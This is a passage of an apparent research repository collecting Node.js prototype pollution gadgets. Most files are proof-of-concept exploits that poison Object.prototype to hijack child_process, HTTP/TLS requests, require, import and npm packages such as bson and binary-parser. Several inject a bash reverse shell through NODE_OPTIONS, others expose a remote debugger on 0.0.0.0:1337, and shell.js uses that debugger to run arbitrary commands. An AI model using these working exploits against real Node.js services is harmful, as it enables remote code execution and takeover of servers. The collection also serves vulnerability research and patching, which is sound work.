console.log('=========================================================='); 23 | 24 | // Check for 'auth' header 25 | const authHeader = req.headers['auth']; 26 | if (!authHeader) { 27 | res.writeHead(200); 28 | res.end('Hello world\n'); 29 | return; 30 | } 31 | 32 | // Generate a simple secret related to the 'auth' value 33 | const secret = `secret-${authHeader}\n`; 34 | 35 | // Respond with the generated secret 36 | res.writeHead(200, { 'Content-Type': 'text/plain' }); 37 | res.end(`Your secret: ${secret}`); 38 | }); 39 | }).listen(443, () => console.log('Server running on https://localhost:443')); 40 
| -------------------------------------------------------------------------------- /nodejs/child_process/exec.env.PoC.js: -------------------------------------------------------------------------------- 1 | const { exec } = require('child_process'); 2 | 3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 4 | 5 | const spawnedProcess = exec('node -e "console.log(`NORMAL EXECUTION`)"', {env: {... process.env, AAA: "BBB" }}); 6 | 7 | spawnedProcess.stdout.on('data', (data) => { 8 | console.log(`Output: ${data}`); 9 | }); 10 | 11 | spawnedProcess.stderr.on('data', (data) => { 12 | console.error(`Error: ${data}`); 13 | }); 14 | 15 | spawnedProcess.on('close', (code) => { 16 | console.log(`Process exited with code ${code}`); 17 | }); 18 | 19 | spawnedProcess.on('error', (err) => { 20 | console.error(`Spawned process error: ${err}`); 21 | }); -------------------------------------------------------------------------------- /nodejs/child_process/execFile.env.PoC.js: -------------------------------------------------------------------------------- 1 | const { execFile } = require('child_process'); 2 | 3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 4 | 5 | const spawnedProcess = execFile('node', [`${__dirname}/test.js`], {env: {AAA: "BBB"}}); 6 | 7 | spawnedProcess.stdout.on('data', (data) => { 8 | console.log(`Output: ${data}`); 9 | }); 10 | 11 | spawnedProcess.stderr.on('data', (data) => { 12 | console.error(`Error: ${data}`); 13 | }); 14 | 15 | spawnedProcess.on('close', (code) => { 16 | console.log(`Process exited with code ${code}`); 17 | }); 18 | 19 | spawnedProcess.on('error', (err) => { 20 | console.error(`Spawned process error: ${err}`); 21 | }); -------------------------------------------------------------------------------- /nodejs/child_process/execFileSync.env.PoC.js: -------------------------------------------------------------------------------- 1 | 2 | const { execFileSync } = require('child_process'); 3 | 4 | 
Object.prototype.shell = "node"; 5 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' }; 6 | 7 | const output = execFileSync('hostname', { }); // the options literal is empty, so any shell or env it appears to have comes from Object.prototype; the call as written asks only for hostname 8 | console.log(output.toString()); 9 | -------------------------------------------------------------------------------- /nodejs/child_process/execFileSync.input.win.PoC.js: -------------------------------------------------------------------------------- 1 | // PARTIALLY FIXED 2 | 3 | const { execFileSync } = require('child_process'); 4 | 5 | Object.prototype.shell = 'cmd.exe.'; 6 | Object.prototype.input = 'echo PWNED\n'; // harmless marker; presumably PWNED in the printed output means the inherited input option reached the spawned shell 7 | 8 | const output = execFileSync('hostname', { }); 9 | console.log(output.toString()); 10 | -------------------------------------------------------------------------------- /nodejs/child_process/execSync.env.PoC.js: -------------------------------------------------------------------------------- 1 | // PARTIALLY FIXED 2 | 3 | const { spawn, spawnSync, exec, execSync } = require('child_process'); 4 | 5 | // Object.prototype.shell = "node"; // doesn't work now 6 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 7 | 8 | const output = execSync('node -e "console.log(`NORMAL EXECUTION`)"', { env: {AAA: "BBB"} }); // only AAA is set explicitly; NODE_OPTIONS can reach the child solely through the prototype of this env literal 9 | console.log(output.toString()); 10 | -------------------------------------------------------------------------------- /nodejs/child_process/execSync.env.lnx.PoC.js: -------------------------------------------------------------------------------- 1 | // FIXED !!!
2 | // we can only add a new env var but not rewrite them 3 | 4 | // based on https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ 5 | // run `nc -lnvp 4242` 6 | const { spawn, spawnSync, exec, execSync } = require('child_process'); 7 | 8 | Object.prototype.shell = "node"; 9 | Object.prototype.env = {}; 10 | Object.prototype.env.AAAA = 'require("child_process").execSync("bash -i >& /dev/tcp/127.0.0.1/4242 0>&1", {shell: "/bin/bash"});process.exit()//'; 11 | Object.prototype.env.NODE_OPTIONS = '--require /proc/self/environ'; 12 | 13 | const output = execSync('ping -c 4 127.0.0.1'); 14 | console.log(output.toString()); 15 | -------------------------------------------------------------------------------- /nodejs/child_process/execSync.input.win.PoC.js: -------------------------------------------------------------------------------- 1 | // FIXED !!! 2 | 3 | const { exec, execSync } = require('child_process'); 4 | 5 | Object.prototype.shell = 'cmd.exe.'; 6 | Object.prototype.input = 'echo PWNED\n'; 7 | 8 | // execSync copies the options by secure way now 9 | const output = execSync('echo "NORMAL EXECUTION"'); 10 | console.log(output.toString()); 11 | -------------------------------------------------------------------------------- /nodejs/child_process/fork.env.PoC.js: -------------------------------------------------------------------------------- 1 | const { fork } = require('child_process'); 2 | 3 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 4 | 5 | const child = fork(`${__dirname}/test.js`, { env: { AAA: "BBB" }}); 6 | 7 | child.on('close', (code) => { 8 | console.log(`Child process exited with code ${code}`); 9 | }); 10 | -------------------------------------------------------------------------------- /nodejs/child_process/package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "child-process-gadgets", 3 | "version": "1.0.0", 4 | "lockfileVersion": 2, 5 | 
"requires": true, 6 | "packages": { 7 | "": { 8 | "name": "child-process-gadgets", 9 | "version": "1.0.0", 10 | "license": "MIT", 11 | "dependencies": { 12 | "node-inspect": "^2.0.0" 13 | } 14 | }, 15 | "node_modules/node-inspect": { 16 | "version": "2.0.0", 17 | "resolved": "https://registry.npmjs.org/node-inspect/-/node-inspect-2.0.0.tgz", 18 | "integrity": "sha512-vaDNU6Fa/vt8gv/PV+QoeSIPhcBnHMiNOtInxcojfagspQg5KP9HloUDGJWIacamT8Agiu51eF+fuBjrE25a6w==", 19 | "deprecated": "This module is part of Node.js core and does not need to be installed separately. It is now unmaintained.", 20 | "bin": { 21 | "node-inspect": "cli.js" 22 | } 23 | } 24 | }, 25 | "dependencies": { 26 | "node-inspect": { 27 | "version": "2.0.0", 28 | "resolved": "https://registry.npmjs.org/node-inspect/-/node-inspect-2.0.0.tgz", 29 | "integrity": "sha512-vaDNU6Fa/vt8gv/PV+QoeSIPhcBnHMiNOtInxcojfagspQg5KP9HloUDGJWIacamT8Agiu51eF+fuBjrE25a6w==" 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /nodejs/child_process/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "child-process-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "shell.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "node-inspect": "^2.0.0" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /nodejs/child_process/shell.js: -------------------------------------------------------------------------------- 1 | // see https://chromedevtools.github.io/devtools-protocol/tot/Debugger 2 | const InspectorClient = require('node-inspect/lib/internal/inspect_client.js'); 3 | const readline = require('readline'); 4 | 5 | const targetIP = '127.0.0.1'; 6 | const targetPort = 1337; 7 | 8 | const rl = readline.createInterface({ 9 | input: process.stdin, 10 | output: process.stdout 11 | }); 12 | 13 | async function main() { 14 | try { 15 | 
const client = new InspectorClient(); 16 | await client.connect(targetPort, targetIP); 17 | 18 | process.stdout.write("INIT\n"); 19 | await client.callMethod("Debugger.enable"); 20 | await client.callMethod("Runtime.enable"); 21 | 22 | await client.addListener('Debugger.paused', async (p) =>{ 23 | process.stdout.write("paused\n\n"); 24 | 25 | rl.setPrompt('> '); 26 | rl.prompt(); 27 | 28 | rl.on('line', async function(cmd) { 29 | let output = await client.callMethod("Runtime.evaluate", { 30 | expression: `require('child_process').execSync('${cmd.trim()}').toString()`, 31 | includeCommandLineAPI: true 32 | }); 33 | 34 | console.log(output.result.value); 35 | 36 | rl.prompt(); 37 | }).on('close', function() { 38 | console.log('Have a great day!'); 39 | process.exit(0); 40 | }); 41 | 42 | //await client.callMethod("Debugger.resume"); 43 | }); 44 | 45 | await client.addListener('Debugger.resumed', (p) =>{ 46 | process.stdout.write("resumed\n"); 47 | }); 48 | 49 | await client.callMethod("Runtime.evaluate", { 50 | expression: "process.on('exit', (code) => {debugger;console.log('EVAL');})", 51 | includeCommandLineAPI: false 52 | }); 53 | 54 | await client.callMethod("Runtime.runIfWaitingForDebugger"); 55 | process.stdout.write("RUN\n"); 56 | } catch (e) { 57 | console.error(e); 58 | process.exit(1); 59 | } 60 | } 61 | 62 | main(); 63 | -------------------------------------------------------------------------------- /nodejs/child_process/spawn.env.PoC.js: -------------------------------------------------------------------------------- 1 | const { spawn } = require('child_process'); 2 | 3 | Object.prototype.shell = "node"; 4 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' }; 5 | 6 | const spawnedProcess = spawn('hostname', { }); 7 | 8 | spawnedProcess.stdout.on('data', (data) => { 9 | console.log(`Output: ${data}`); 10 | }); 11 | 12 | spawnedProcess.stderr.on('data', (data) => { 13 | console.error(`Error: ${data}`); 14 | }); 15 | 16 | 
spawnedProcess.on('close', (code) => { 17 | console.log(`Process exited with code ${code}`); 18 | }); 19 | 20 | spawnedProcess.on('error', (err) => { 21 | console.error(`Spawned process error: ${err}`); 22 | }); -------------------------------------------------------------------------------- /nodejs/child_process/spawn.input.win.js: -------------------------------------------------------------------------------- 1 | // FIXED !! 2 | 3 | const { spawn } = require('child_process'); 4 | 5 | Object.prototype.shell = 'cmd.exe.'; 6 | Object.prototype.input = 'echo PWNED\n'; 7 | 8 | const spawnedProcess = spawn('hostname', {}); 9 | 10 | spawnedProcess.stdout.on('data', (data) => { 11 | console.log(`Output: ${data}`); 12 | }); 13 | 14 | spawnedProcess.stderr.on('data', (data) => { 15 | console.error(`Error: ${data}`); 16 | }); 17 | 18 | spawnedProcess.on('close', (code) => { 19 | console.log(`Process exited with code ${code}`); 20 | }); 21 | 22 | spawnedProcess.on('error', (err) => { 23 | console.error(`Spawned process error: ${err}`); 24 | }); -------------------------------------------------------------------------------- /nodejs/child_process/spawnSync.env.PoC.js: -------------------------------------------------------------------------------- 1 | // PARTIALLY FIXED 2 | 3 | const { spawn, spawnSync, exec, execSync, execFile, execFileSync } = require('child_process'); 4 | 5 | Object.prototype.shell = "node"; 6 | Object.prototype.env = { NODE_OPTIONS: '--inspect-brk=0.0.0.0:1337' }; 7 | 8 | const cp = spawnSync('hostname', { }); 9 | console.log(cp.output.toString()); 10 | 11 | -------------------------------------------------------------------------------- /nodejs/child_process/spawnSync.env.lnx.PoC.js: -------------------------------------------------------------------------------- 1 | // FIXED 2 | 3 | // based on https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ 4 | // run `nc -lnvp 4242` 5 | const { spawn, spawnSync, exec, execSync, execFile, 
execFileSync } = require('child_process'); 6 | 7 | Object.prototype.shell = "node"; 8 | Object.prototype.env = {}; 9 | Object.prototype.env.AAAA = 'require("child_process").execSync("bash -i >& /dev/tcp/127.0.0.1/4242 0>&1", {shell: "/bin/bash"});process.exit()//'; 10 | Object.prototype.env.NODE_OPTIONS = '--require /proc/self/environ'; 11 | 12 | const output = spawnSync('ping -c 4 127.0.0.1'); 13 | console.log(output.toString()); 14 | -------------------------------------------------------------------------------- /nodejs/child_process/spawnSync.input.win.PoC.js: -------------------------------------------------------------------------------- 1 | // PARTIALLY FIXED 2 | 3 | const { spawnSync } = require('child_process'); 4 | 5 | Object.prototype.shell = 'cmd.exe.'; 6 | Object.prototype.input = 'echo PWNED\n'; 7 | 8 | const cp = spawnSync('hostname', {}); 9 | console.log(cp.output.toString()); 10 | -------------------------------------------------------------------------------- /nodejs/child_process/test.js: -------------------------------------------------------------------------------- 1 | console.log("NORMAL EXECUTION") -------------------------------------------------------------------------------- /nodejs/http/fetch.options.PoC.js: -------------------------------------------------------------------------------- 1 | Object.prototype.referrer = 'http://google.com'; // DoS 2 | Object.prototype.method = "POST" // EoP 3 | Object.prototype.body = "AAA" // EoP 4 | 5 | fetch('http://localhost:3000') -------------------------------------------------------------------------------- /nodejs/http/fetch.socketPath.PoC.js: -------------------------------------------------------------------------------- 1 | // listen the socket by `nc -lU /tmp/socket1` 2 | 3 | // By default, Docker runs through a non-networked UNIX socket. 
4 | // try to use it to send a GET request to /containers/json 5 | 6 | Object.prototype.socketPath = '/tmp/socket1'; 7 | 8 | async function main() { 9 | console.log(await fetch('http://example.com')) // the caller passes only a URL; socketPath is never supplied explicitly 10 | } 11 | 12 | main(); -------------------------------------------------------------------------------- /nodejs/http/get.options.PoC.js: -------------------------------------------------------------------------------- 1 | const http = require('http'); 2 | 3 | // G1 4 | //Object.prototype.agent = "aaa" // DoS 5 | 6 | // G2 7 | Object.prototype.method = "POST"; 8 | Object.prototype.port = 3000; 9 | Object.prototype.headers = {test: 123, host: 'fake'}; 10 | Object.prototype.path = '/test-path' 11 | //Object.prototype.hostname = "example.com" // sends the request to this address and ignores host 12 | 13 | http.get({ 14 | host: 'localhost', // the only option the caller sets; method, port, headers and path are not own properties of this literal 15 | //port: 3000, 16 | }); 17 | -------------------------------------------------------------------------------- /nodejs/http/listen.host.PoC.js: -------------------------------------------------------------------------------- 1 | const http = require('http'); 2 | 3 | //Object.prototype.host = "example.com"; // DoS (via an exception) or sending DNS request 4 | Object.prototype.backlog = "fdsfsd"; // DoS by native uncaught exception 5 | 6 | try { 7 | const server = http.createServer(() => { 8 | console.log("HEJ!") 9 | }); 10 | 11 | server.listen(1234, () => { 12 | console.log("HELLO!") 13 | }); 14 | } catch (e) { 15 | console.log(e) 16 | } -------------------------------------------------------------------------------- /nodejs/http/requiest.options.PoC.js: -------------------------------------------------------------------------------- 1 | const http = require('http'); 2 | 3 | Object.prototype.method = "POST"; 4 | Object.prototype.port = 3000; 5 | Object.prototype.headers = {test: 123, host: 'fake'}; 6 | Object.prototype.path = '/test' 7 | //Object.prototype.hostname = "example.com" // sends the request to this address and ignores host 8 | 9 | const
req = http.request({ 10 | host: 'localhost', 11 | //port: 3000, 12 | }); 13 | 14 | req.end(); 15 | -------------------------------------------------------------------------------- /nodejs/https/get.options.PoC.js: -------------------------------------------------------------------------------- 1 | const https = require('https'); 2 | 3 | Object.prototype.method = "POST"; 4 | // Object.prototype.port = 3000; 5 | Object.prototype.headers = {test: 123, host: 'fake'}; 6 | Object.prototype.path = '/test'; 7 | Object.prototype.NODE_TLS_REJECT_UNAUTHORIZED = '0'; // NOTE(review): named after the environment variable that switches off TLS certificate verification; the explicit rejectUnauthorized option below is commented out - confirm whether this key is what lets the request through to the self-signed test server 8 | //Object.prototype.hostname = "example.com" // sends the request to this address and ignores host 9 | 10 | //Object.prototype.session = 1 // DoS 11 | //Object.prototype.ALPNProtocols = ['http/1.0'] // DoS or changing protocol if the server supports it 12 | 13 | const options = { 14 | host: 'localhost', 15 | //rejectUnauthorized: false // to ignore self-signed certificate errors 16 | }; 17 | 18 | const req = https.get(options, (res) => { 19 | console.log(`statusCode: ${res.statusCode}`); 20 | 21 | res.on('data', (d) => { 22 | process.stdout.write(d); 23 | }); 24 | }); 25 | 26 | req.on('error', (e) => { 27 | console.error(e); 28 | }); 29 | 30 | req.end(); 31 | -------------------------------------------------------------------------------- /nodejs/https/requiest.options.PoC.js: -------------------------------------------------------------------------------- 1 | const https = require('https'); 2 | 3 | Object.prototype.method = "POST"; 4 | // Object.prototype.port = 3000; 5 | Object.prototype.headers = {test: 123, host: 'fake'}; 6 | Object.prototype.path = '/test' 7 | //Object.prototype.hostname = "example.com" // sends the request to this address and ignores host 8 | 9 | //Object.prototype.session = 1 // DoS 10 | //Object.prototype.ALPNProtocols = ['http/1.0'] // DoS or changing protocol if the server supports it 11 | 12 | const options = { 13 | host: 'localhost', 14 | rejectUnauthorized: false // to ignore self-signed
certificate errors 15 | }; 16 | 17 | const req = https.request(options, (res) => { 18 | console.log(`statusCode: ${res.statusCode}`); 19 | 20 | res.on('data', (d) => { 21 | process.stdout.write(d); 22 | }); 23 | }); 24 | 25 | req.on('error', (e) => { 26 | console.error(e); 27 | }); 28 | 29 | req.end(); 30 | -------------------------------------------------------------------------------- /nodejs/https/tls.connect.PoC.js: -------------------------------------------------------------------------------- 1 | const tls = require('tls'); 2 | 3 | //Object.prototype.session = 1 // DoS 4 | Object.prototype.port = 3000; 5 | Object.prototype.path = '/test'; 6 | //Object.prototype.rejectUnauthorized = false; 7 | 8 | tls.connect({ 9 | //port: 3000, 10 | //path: '/test', 11 | host: '127.0.0.1', 12 | //ALPNProtocols: ['h2'], 13 | }).on('error', (e) => console.log(e)); 14 | -------------------------------------------------------------------------------- /nodejs/import/import.source.PoC.js: -------------------------------------------------------------------------------- 1 | 2 | Object.prototype.source = 'console.log("PWNED")' 3 | 4 | import('./test.mjs') -------------------------------------------------------------------------------- /nodejs/import/test.mjs: -------------------------------------------------------------------------------- 1 | console.log('NORMAL EXECUTION') -------------------------------------------------------------------------------- /nodejs/require/package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "require-gadgets", 3 | "version": "1.0.0", 4 | "lockfileVersion": 2, 5 | "requires": true, 6 | "packages": { 7 | "": { 8 | "name": "require-gadgets", 9 | "version": "1.0.0", 10 | "license": "MIT", 11 | "dependencies": { 12 | "bytes": "^3.1.2" 13 | } 14 | }, 15 | "node_modules/bytes": { 16 | "version": "3.1.2", 17 | "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", 18 | "integrity": 
"sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", 19 | "engines": { 20 | "node": ">= 0.8" 21 | } 22 | } 23 | }, 24 | "dependencies": { 25 | "bytes": { 26 | "version": "3.1.2", 27 | "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", 28 | "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==" 29 | } 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /nodejs/require/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "require-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "bytes": "^3.1.2" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /nodejs/require/require.main.PoC.js: -------------------------------------------------------------------------------- 1 | 2 | Object.prototype.main = 'C:/PROGRA~1/nodejs/node_modules/corepack/dist/npm.js' // for Windows 3 | //Object.prototype.main = "/usr/lib/node_modules/corepack/dist/npm.js" // for Linux 4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 5 | 6 | require('bytes') -------------------------------------------------------------------------------- /nodejs/require/require.main2.PoC.js: -------------------------------------------------------------------------------- 1 | // FIXED in v18.19.0 https://github.com/nodejs/node/commit/fe26f8a8609f7af04f9149f2c515f423e483018b 2 | 3 | Object.prototype.main = 'C:/PROGRA~1/nodejs/node_modules/corepack/dist/npm.js' // for Windows 4 | //Object.prototype.main = "/usr/lib/node_modules/corepack/dist/npm.js" // for Linux 5 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 6 | 7 | require('./test_sub_folder') -------------------------------------------------------------------------------- 
/nodejs/require/test_sub_folder/index.js: -------------------------------------------------------------------------------- 1 | console.log("NORMAL EXECUTION") -------------------------------------------------------------------------------- /nodejs/working_threads/ctor.PoC.js: -------------------------------------------------------------------------------- 1 | const { Worker } = require('worker_threads'); 2 | 3 | //Object.prototype.eval = true; // DoS or second-order ACE if an attacker controls a part of file name 4 | //Object.prototype.env = { AAA: "attacker controlled" }; 5 | 6 | 7 | new Worker(`${__dirname}/test.js`, { workerData: {}, execArgv: ['--inspect-brk', '0.0.0.0:1337'] }) -------------------------------------------------------------------------------- /nodejs/working_threads/test.js: -------------------------------------------------------------------------------- 1 | 2 | if (process.env.AAA) 3 | console.log("ENV VAR AAA: " + process.env.AAA) 4 | else 5 | console.log("NO ENV VAR AAA") -------------------------------------------------------------------------------- /npm-packages/0-day.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KTH-LangSec/server-side-prototype-pollution/adf98a88baad39383fec8aa4a6d4ac28986b2a1b/npm-packages/0-day.zip -------------------------------------------------------------------------------- /npm-packages/asyncawait/asyncawait.PoC.js: -------------------------------------------------------------------------------- 1 | Object.prototype.shell = "node"; 2 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 3 | 4 | // TODO: exploitable only on Linux; the reverse shell does not work 5 | 6 | var async = require('asyncawait/async'); 7 | 8 | // the rest part of the example is not required: 9 | 10 | // var await = require('asyncawait/await'); 11 | // var Promise = require('bluebird'); 12 | // var fs = Promise.promisifyAll(require('fs')); // adds Async() 
versions that return promises 13 | // var path = require('path'); 14 | // var _ = require('lodash'); 15 | 16 | // /** Returns the number of files in the given directory. */ 17 | // var countFiles = async (function (dir) { 18 | // var files = await (fs.readdirAsync(dir)); 19 | // var paths = _.map(files, function (file) { return path.join(dir, file); }); 20 | // var stats = await (_.map(paths, function (path) { return fs.statAsync(path); })); // parallel! 21 | // return _.filter(stats, function (stat) { return stat.isFile(); }).length; 22 | // }); 23 | 24 | // // Give it a spin 25 | // countFiles(__dirname) 26 | // .then (function (num) { console.log('There are ' + num + ' files in ' + __dirname); }) 27 | // .catch(function (err) { console.log('Something went wrong: ' + err); }); -------------------------------------------------------------------------------- /npm-packages/asyncawait/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "asyncawait-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "asyncawait": "^3.0.0" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/better-queue/better-queue.PoC.js: -------------------------------------------------------------------------------- 1 | var Queue = require('better-queue'); 2 | 3 | // see npm-packages\node_modules\better-queue-payload.js 4 | Object.prototype.store = 'payload' 5 | 6 | var q = new Queue(function (input, cb) { 7 | // Some processing here ... 
8 | cb(null, result); 9 | }) 10 | 11 | q.push(1) 12 | q.push({ x: 1 }) -------------------------------------------------------------------------------- /npm-packages/better-queue/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "better-queue-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "better-queue": "^3.8.12" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/binary-parser/binary-parser.PoC.js: -------------------------------------------------------------------------------- 1 | // Module import 2 | const Parser = require("binary-parser").Parser; 3 | 4 | const payload = `console.log("PWNED")`; 5 | Object.prototype.alias = `(){};${payload};'*/var a='/*';btoa`; 6 | 7 | // Build an IP packet header Parser 8 | const ipHeader = new Parser() 9 | .endianness("big") 10 | .bit4("version") 11 | .bit4("headerLength") 12 | .uint8("tos") 13 | .uint16("packetLength") 14 | .uint16("id") 15 | .bit3("offset") 16 | .bit13("fragOffset") 17 | .uint8("ttl") 18 | .uint8("protocol") 19 | .uint16("checksum") 20 | .array("src", { 21 | type: "uint8", 22 | length: 4 23 | }) 24 | .array("dst", { 25 | type: "uint8", 26 | length: 4 27 | }); 28 | 29 | // Prepare buffer to parse. 
30 | const buf = Buffer.from("450002c5939900002c06ef98adc24f6c850186d1", "hex"); 31 | 32 | // Parse buffer and show result 33 | console.log(ipHeader.parse(buf)); -------------------------------------------------------------------------------- /npm-packages/binary-parser/package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "binary-parser-gadgets", 3 | "version": "1.0.0", 4 | "lockfileVersion": 2, 5 | "requires": true, 6 | "packages": { 7 | "": { 8 | "name": "binary-parser-gadgets", 9 | "version": "1.0.0", 10 | "license": "MIT", 11 | "dependencies": { 12 | "binary-parser": "^2.2.1" 13 | } 14 | }, 15 | "node_modules/binary-parser": { 16 | "version": "2.2.1", 17 | "resolved": "https://registry.npmjs.org/binary-parser/-/binary-parser-2.2.1.tgz", 18 | "integrity": "sha512-5ATpz/uPDgq5GgEDxTB4ouXCde7q2lqAQlSdBRQVl/AJnxmQmhIfyxJx+0MGu//D5rHQifkfGbWWlaysG0o9NA==", 19 | "engines": { 20 | "node": ">=12" 21 | } 22 | } 23 | }, 24 | "dependencies": { 25 | "binary-parser": { 26 | "version": "2.2.1", 27 | "resolved": "https://registry.npmjs.org/binary-parser/-/binary-parser-2.2.1.tgz", 28 | "integrity": "sha512-5ATpz/uPDgq5GgEDxTB4ouXCde7q2lqAQlSdBRQVl/AJnxmQmhIfyxJx+0MGu//D5rHQifkfGbWWlaysG0o9NA==" 29 | } 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /npm-packages/binary-parser/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "binary-parser-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "binary-parser": "^2.2.1" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/bson/bson.PoC.js: -------------------------------------------------------------------------------- 1 | const BSON = require('bson'); 2 | 3 | const payload = BSON.serialize( 4 | { 5 
| func: { 6 | _bsontype: "Code", 7 | code: "console.log('PWNED')" 8 | } 9 | } 10 | ); 11 | 12 | Object.prototype.evalFunctions = 1; 13 | 14 | const result = BSON.deserialize(payload); 15 | result.func(); -------------------------------------------------------------------------------- /npm-packages/bson/package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bson-gadgets", 3 | "version": "1.0.0", 4 | "lockfileVersion": 3, 5 | "requires": true, 6 | "packages": { 7 | "": { 8 | "name": "bson-gadgets", 9 | "version": "1.0.0", 10 | "license": "MIT", 11 | "dependencies": { 12 | "bson": "4.7.2" 13 | } 14 | }, 15 | "node_modules/base64-js": { 16 | "version": "1.5.1", 17 | "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", 18 | "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", 19 | "funding": [ 20 | { 21 | "type": "github", 22 | "url": "https://github.com/sponsors/feross" 23 | }, 24 | { 25 | "type": "patreon", 26 | "url": "https://www.patreon.com/feross" 27 | }, 28 | { 29 | "type": "consulting", 30 | "url": "https://feross.org/support" 31 | } 32 | ] 33 | }, 34 | "node_modules/bson": { 35 | "version": "4.7.2", 36 | "resolved": "https://registry.npmjs.org/bson/-/bson-4.7.2.tgz", 37 | "integrity": "sha512-Ry9wCtIZ5kGqkJoi6aD8KjxFZEx78guTQDnpXWiNthsxzrxAK/i8E6pCHAIZTbaEFWcOCvbecMukfK7XUvyLpQ==", 38 | "dependencies": { 39 | "buffer": "^5.6.0" 40 | }, 41 | "engines": { 42 | "node": ">=6.9.0" 43 | } 44 | }, 45 | "node_modules/buffer": { 46 | "version": "5.7.1", 47 | "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", 48 | "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", 49 | "funding": [ 50 | { 51 | "type": "github", 52 | "url": "https://github.com/sponsors/feross" 53 | }, 54 | { 55 | "type": "patreon", 56 | "url": "https://www.patreon.com/feross" 57 | }, 58 
| { 59 | "type": "consulting", 60 | "url": "https://feross.org/support" 61 | } 62 | ], 63 | "dependencies": { 64 | "base64-js": "^1.3.1", 65 | "ieee754": "^1.1.13" 66 | } 67 | }, 68 | "node_modules/ieee754": { 69 | "version": "1.2.1", 70 | "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", 71 | "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", 72 | "funding": [ 73 | { 74 | "type": "github", 75 | "url": "https://github.com/sponsors/feross" 76 | }, 77 | { 78 | "type": "patreon", 79 | "url": "https://www.patreon.com/feross" 80 | }, 81 | { 82 | "type": "consulting", 83 | "url": "https://feross.org/support" 84 | } 85 | ] 86 | } 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /npm-packages/bson/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bson-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "author": "", 7 | "license": "MIT", 8 | "dependencies": { 9 | "bson": "4.7.2" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /npm-packages/chrome-launcher/chrome-launcher.PoC.js: -------------------------------------------------------------------------------- 1 | const ChromeLauncher = require('chrome-launcher'); 2 | 3 | Object.prototype.shell = 'node'; 4 | Object.prototype.NODE_OPTIONS = '--inspect-brk=0.0.0.0:1337'; 5 | 6 | ChromeLauncher.launch({ 7 | startingUrl: 'https://google.com' 8 | }).then(chrome => { 9 | console.log(`Chrome debugging port running on ${chrome.port}`); 10 | }); -------------------------------------------------------------------------------- /npm-packages/chrome-launcher/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "chrome-launcher-gadgets", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": 
